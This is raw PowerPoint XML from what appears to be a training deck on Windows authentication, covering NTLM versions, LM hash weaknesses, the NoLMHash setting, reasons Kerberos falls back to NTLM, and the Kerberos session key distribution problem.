              <a:t>Pre-Windows 2000 machines don’t support Kerberos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application is not Kerberos compatible and is hard-coded to use NTLM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>server or client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> service account are not part of a trusted domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos isn’t configured correctly (missing SPN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Accessing the server using its IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Accessing a server in a different domain (forest) with external trust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the logon scenario cannot support Kerberos due to physical constraints</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When does Kerberos not work?</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="he-IL"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1723810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320165"/>
            <a:ext cx="7924800" cy="3924151"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Challenge-Response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft proprietary authentication protocol.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LM, NTLMv1, NTLMv2 all use the same message transmission protocol but differ in the response function:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LM – DES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLMv1 – MD4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLMv2 – HMAC-MD5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The protocol is embedded within the application protocol’s packets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May provide session security by signing and encrypting application messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Security Watch The Most Misunderstood Windows Security Setting of All Time</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLM</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="he-IL"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="388782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320165"/>
            <a:ext cx="7924800" cy="3262432"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LM is really weak:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All letters are converted to uppercase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Non Unicode – each character equals 1 byte, total of 69 effective characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password length limit is 14 characters. Each 7 characters used as DES key to encrypt the string “KGS!@#$%”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The 2 encrypted bit strings are then concatenated. = 128 bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dbcsPwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>NoLMHash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>storing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> LM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://support.microsoft.com/en-us/help/299656/how-to-prevent-windows-from-storing-a-lan-manager-hash-of-your-passwor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLM – Hash Methods</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="he-IL"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68293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320165"/>
            <a:ext cx="7924800" cy="369332"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLM - Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="he-IL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947954" y="1008072"/>
            <a:ext cx="5233088" cy="3011849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947954" y="4158420"/>
            <a:ext cx="5233088" cy="2291041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="67087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5"/>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="648742" y="1261335"/>
                <a:ext cx="7924800" cy="4323684"/>
              </a:xfrm>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2">
                        <a:lumMod val="10000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Any two security principals in the realm (domain) need a unique session key.</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2">
                        <a:lumMod val="10000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>If n is the number of security principals in the domain, we need to maintain this number of session keys:</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2">
                        <a:lumMod val="10000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:br>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2">
                        <a:lumMod val="10000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a14:m>
                  <m:oMath xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math">
                    <m:d>
                      <m:dPr>
                        <m:ctrlPr>
                          <a:rPr lang="pt-BR" i="1">
                            <a:solidFill>
                              <a:schemeClr val="bg2">
                                <a:lumMod val="10000"/>
                              </a:schemeClr>
                            </a:solidFill>
                            <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                          </a:rPr>
                        </m:ctrlPr>
                      </m:dPr>
                      <m:e>
                        <m:f>
                          <m:fPr>
                            <m:type m:val="noBar"/>
                            <m:ctrlPr>
                              <a:rPr lang="pt-BR" i="1">
                                <a:solidFill>
                                  <a:schemeClr val="bg2">
                                    <a:lumMod val="10000"/>
                                  </a:schemeClr>
                                </a:solidFill>
                                <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                              </a:rPr>
                            </m:ctrlPr>
                          </m:fPr>
                          <m:num>
                            <m:r>
                              <a:rPr lang="pt-BR" i="1">
                                <a:solidFill>
                                  <a:schemeClr val="bg2">
                                    <a:lumMod val="10000"/>
                                  </a:schemeClr>
                                </a:solidFill>
                                <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                              </a:rPr>
                              <m:t>𝑛</m:t>
                            </m:r>
                          </m:num>
                          <m:den>
                            <m:r>
                              <a:rPr lang="en-US" i="1">
                                <a:solidFill>
                                  <a:schemeClr val="bg2">
                                    <a:lumMod val="10000"/>
                                  </a:schemeClr>
                                </a:solidFill>
                                <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                              </a:rPr>
                              <m:t>2</m:t>
                            </m:r>
                          </m:den>
                        </m:f>
                      </m:e>
                    </m:d>
                    <m:r>
                      <a:rPr lang="en-US" i="1">
                        <a:solidFill>
                          <a:schemeClr val="bg2">
                            <a:lumMod val="10000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                      </a:rPr>
                      <m:t>=</m:t>
                    </m:r>
                    <m:f>
                      <m:fPr>
                        <m:ctrlPr>
                          <a:rPr lang="en-US" i="1">
                            <a:solidFill>
                              <a:schemeClr val="bg2">
                                <a:lumMod val="10000"/>
                              </a:schemeClr>
                            </a:solidFill>
                            <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                          </a:rPr>
                        </m:ctrlPr>
                      </m:fPr>
                      <m:num>
                        <m:r>
                          <a:rPr lang="en-US" i="1">
                            <a:solidFill>
                              <a:schemeClr val="bg2">
                                <a:lumMod val="10000"/>
                              </a:schemeClr>
                            </a:solidFill>
                            <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                          </a:rPr>
                          <m:t>𝑛</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="en-US" i="1">
                            <a:solidFill>
                              <a:schemeClr val="bg2">
                                <a:lumMod val="10000"/>
                              </a:schemeClr>
                            </a:solidFill>
                            <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                          </a:rPr>
                          <m:t>∙(</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="en-US" i="1">
                            <a:solidFill>
                              <a:schemeClr val="bg2">
                                <a:lumMod val="10000"/>
                              </a:schemeClr>
                            </a:solidFill>
                            <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                          </a:rPr>
                          <m:t>𝑛</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="en-US" i="1">
                            <a:solidFill>
                              <a:schemeClr val="bg2">
                                <a:lumMod val="10000"/>
                              </a:schemeClr>
                            </a:solidFill>
                            <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                          </a:rPr>
                          <m:t>−</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="en-US" i="1">
                            <a:solidFill>
                              <a:schemeClr val="bg2">
                                <a:lumMod val="10000"/>
                              </a:schemeClr>
                            </a:solidFill>
                            <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                          </a:rPr>
                          <m:t>1</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="en-US" i="1">
                            <a:solidFill>
                              <a:schemeClr val="bg2">
                                <a:lumMod val="10000"/>
                              </a:schemeClr>
                            </a:solidFill>
                            <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                          </a:rPr>
                          <m:t>)</m:t>
                        </m:r>
                      </m:num>
                      <m:den>
                        <m:r>
                          <a:rPr lang="en-US" i="1">
                            <a:solidFill>
                              <a:schemeClr val="bg2">
                                <a:lumMod val="10000"/>
                              </a:schemeClr>
                            </a:solidFill>
                            <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                          </a:rPr>
                          <m:t>2</m:t>
                        </m:r>
                      </m:den>
                    </m:f>
                  </m:oMath>
                </a14:m>
                <a:br>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2">
                        <a:lumMod val="10000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="10000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="10000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2">
                        <a:lumMod val="10000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>This is impossible to manage</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2">
                        <a:lumMod val="10000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>10 users = 45 keys</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2">
                        <a:lumMod val="10000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>100 users = 4950 keys</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2">
                        <a:lumMod val="10000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>1.000 users = 499.500 keys</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2">
                        <a:lumMod val="10000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>10.000 users = 49.995.000 keys</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2" name="Content Placeholder 1"/>
              <p:cNvSpPr>
                <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:ph idx="15"/>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="648742" y="1261335"/>
                <a:ext cx="7924800" cy="4323684"/>
              </a:xfrm>
              <a:blipFill rotWithShape="0">
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect t="-1693" r="-2308" b="-1975"/>
                </a:stretch>
              </a:blipFill>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="de-DE">
                    <a:noFill/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session Key Distribution Problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overview of the Kerberos Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194925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NTLM – Message Flow (domain user)</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLM Pass-Through Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 3" descr="C:\Users\administrator\Pictures\DVD_ART36\Artwork_Imagery\Icons - Illustrations\_ WINDOWS SERVER ICONS\Hardware\Virtual Servers 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1449" y="3919837"/>
            <a:ext cx="1047761" cy="143593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389436" y="4069898"/>
            <a:ext cx="1541756" cy="1285876"/>
            <a:chOff x="2615125" y="1684772"/>
            <a:chExt cx="1835492" cy="1285876"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 2" descr="C:\Users\administrator\Pictures\DVD_ART36\Artwork_Imagery\Icons - Illustrations\_ WINDOWS SERVER ICONS\Hardware\Computer PC desktop machin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5125" y="1684772"/>
              <a:ext cx="1835492" cy="12858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administrator\Pictures\DVD_ART36\Artwork_Imagery\Icons - Illustrations\_ SECURITY ICONS\Security ie Internet Explor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96180">
              <a:off x="3422226" y="1961218"/>
              <a:ext cx="441399" cy="392688"/>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4" descr="C:\Users\administrator\Pictures\DVD_ART36\Artwork_Imagery\Icons - Illustrations\_ VISTA STYLE\people icon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775" y="3907823"/>
            <a:ext cx="638736" cy="53608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149180" y="3884831"/>
            <a:ext cx="4203628" cy="215444"/>
            <a:chOff x="2149180" y="3884831"/>
            <a:chExt cx="4203628" cy="215444"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="19" name="Straight Arrow Connector 18"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2149180" y="3992553"/>
              <a:ext cx="4203628"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179701" y="3884831"/>
              <a:ext cx="2672459" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Application NTLM Authentication</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2139864" y="4318581"/>
            <a:ext cx="4279828" cy="215444"/>
            <a:chOff x="2139864" y="4318581"/>
            <a:chExt cx="4279828" cy="215444"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2139864" y="4400311"/>
              <a:ext cx="4279828"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71251" y="4318581"/>
